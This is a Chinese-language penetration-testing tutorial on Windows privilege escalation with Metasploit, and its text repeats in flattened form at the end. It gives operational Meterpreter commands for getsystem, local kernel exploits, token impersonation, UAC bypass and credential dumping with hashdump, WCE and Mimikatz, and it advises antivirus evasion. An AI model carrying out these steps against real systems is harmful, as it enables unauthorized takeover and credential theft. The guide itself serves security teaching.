Metasploit权限提升全剧终
字数 1480 2025-08-29 08:31:47

Metasploit权限提升全面指南

0×01 权限提升概述

权限提升是渗透测试中的关键环节,主要分为两类:

  1. 纵向提权:低权限角色获得高权限角色的权限

    • 例如:webshell权限提升到管理员权限
  2. 横向提权:获取同级别角色的权限

    • 例如:通过系统A获取系统B的权限

检查当前权限

在meterpreter shell中:

shell
whoami /groups

查看Mandatory Label判断当前权限级别:

  • Medium MandatoryLevel:标准用户
  • High MandatoryLevel:管理员权限

0×02 getsystem提权

基本使用

getsystem -h  # 查看帮助
getsystem     # 尝试所有技术提权

三种提权技术

  1. 命名管道模拟
  2. 令牌复制
  3. 命名管道模拟(替代方案)

特点

  • 简单高效
  • 建议首先尝试此方法

0×03 利用本地漏洞提权

步骤

  1. 检查当前权限:

    getuid
    
  2. 获取系统补丁信息:

    shell
    systeminfo
    # 或检查c:\windows\下的补丁日志
    
  3. 查找可用漏洞(常见漏洞示例):

    • ms13_053
    • ms14_058
    • ms16_016
    • ms16_032

漏洞资源网站

  1. 安全焦点:http://www.securityfocus.com/bid
  2. Exploit-DB:http://www.exploit-db.com

操作示例(以ms16_016为例)

background  # 转为后台
search ms16_016
use exploit/windows/local/ms16_016_webdav
set SESSION [当前session ID]
exploit

部分系统补丁对照表

系统版本 补丁号 对应漏洞
Win2003 KB2360937 MS10-084
Win2008 KB2478960 MS11-014
Win2012 KB2507938 MS11-056
通用 KB3045171 MS15-051
通用 KB3000061 MS14-058

0×04 假冒令牌提权

令牌类型

  1. Delegation Tokens:授权令牌,支持交互式登录
  2. Impersonation Tokens:模拟令牌,非交互会话

操作步骤

use incognito
list_tokens -u  # 列出可用令牌
impersonate_token [管理员令牌路径]
# 例如:impersonate_token "WIN-57TJ4B561MT\Administrator"

验证

shell
whoami

0×05 绕过UAC提权

UAC设置级别

  1. 始终通知
  2. 仅在程序试图更改我的计算机时通知我(默认)
  3. 同上但不降低桌面亮度
  4. 从不提示

方法一:Bypassuac模块

use exploit/windows/local/bypassuac
set SESSION [当前session ID]
exploit

注意事项

  • 当前用户必须在管理员组
  • UAC设置为默认级别
  • 会创建文件,可能被杀毒软件检测

方法二:Bypassuac_injection

use exploit/windows/local/bypassuac_injection

特点:运行在内存中,不触碰硬盘

方法三:RunAs模块

use exploit/windows/local/ask
set FILENAME "update.exe"  # 可自定义
exploit

特点

  • 需要用户交互点击"是"
  • 可结合免杀技术

0×06 HASH攻击

方法一:hashdump

hashdump  # 提取本地HASH
smart_hashdump  # 提取域所有用户HASH

方法二:WCE工具

  1. 上传wce.exe
  2. 执行:
    wce -w  # 获取明文密码
    

方法三:Mimikatz

load mimikatz
kerberos  # 获取kerberos凭证

HASH破解网站

  1. http://www.cmd5.com/
  2. http://www.xmd5.com/

附录:常用命令速查

命令 功能
getuid 查看当前权限
getsystem 尝试自动提权
sysinfo 查看系统信息
ps 查看进程列表
migrate [PID] 迁移到高权限进程
background 将session转为后台

注意事项

  1. 按顺序尝试提权方法:getsystem → 本地漏洞 → 令牌假冒 → UAC绕过
  2. 注意工具免杀处理
  3. 横向移动前确保已获取足够权限
  4. Windows 8+系统需要特殊处理

通过系统掌握这些提权技术,可以显著提高渗透测试的成功率,但请务必在合法授权范围内使用这些技术。

Metasploit权限提升全面指南 0×01 权限提升概述 权限提升是渗透测试中的关键环节,主要分为两类: 纵向提权 :低权限角色获得高权限角色的权限 例如:webshell权限提升到管理员权限 横向提权 :获取同级别角色的权限 例如:通过系统A获取系统B的权限 检查当前权限 在meterpreter shell中: 查看 Mandatory Label 判断当前权限级别: Medium MandatoryLevel :标准用户 High MandatoryLevel :管理员权限 0×02 getsystem提权 基本使用 三种提权技术 命名管道模拟 令牌复制 命名管道模拟(替代方案) 特点 : 简单高效 建议首先尝试此方法 0×03 利用本地漏洞提权 步骤 检查当前权限: 获取系统补丁信息: 查找可用漏洞(常见漏洞示例): ms13_ 053 ms14_ 058 ms16_ 016 ms16_ 032 漏洞资源网站 安全焦点:http://www.securityfocus.com/bid Exploit-DB:http://www.exploit-db.com 操作示例(以ms16_ 016为例) 部分系统补丁对照表 | 系统版本 | 补丁号 | 对应漏洞 | |---------|--------|----------| | Win2003 | KB2360937 | MS10-084 | | Win2008 | KB2478960 | MS11-014 | | Win2012 | KB2507938 | MS11-056 | | 通用 | KB3045171 | MS15-051 | | 通用 | KB3000061 | MS14-058 | 0×04 假冒令牌提权 令牌类型 Delegation Tokens :授权令牌,支持交互式登录 Impersonation Tokens :模拟令牌,非交互会话 操作步骤 验证 0×05 绕过UAC提权 UAC设置级别 始终通知 仅在程序试图更改我的计算机时通知我(默认) 同上但不降低桌面亮度 从不提示 方法一:Bypassuac模块 注意事项 : 当前用户必须在管理员组 UAC设置为默认级别 会创建文件,可能被杀毒软件检测 方法二:Bypassuac_ injection 特点:运行在内存中,不触碰硬盘 方法三:RunAs模块 特点 : 需要用户交互点击"是" 可结合免杀技术 0×06 HASH攻击 方法一:hashdump 方法二:WCE工具 上传wce.exe 执行: 方法三:Mimikatz HASH破解网站 http://www.cmd5.com/ http://www.xmd5.com/ 附录:常用命令速查 | 命令 | 功能 | |------|------| | getuid | 查看当前权限 | | getsystem | 尝试自动提权 | | sysinfo | 查看系统信息 | | ps | 查看进程列表 | | migrate [PID] | 迁移到高权限进程 | | background | 将session转为后台 | 注意事项 按顺序尝试提权方法:getsystem → 本地漏洞 → 令牌假冒 → UAC绕过 注意工具免杀处理 横向移动前确保已获取足够权限 Windows 8+系统需要特殊处理 通过系统掌握这些提权技术,可以显著提高渗透测试的成功率,但请务必在合法授权范围内使用这些技术。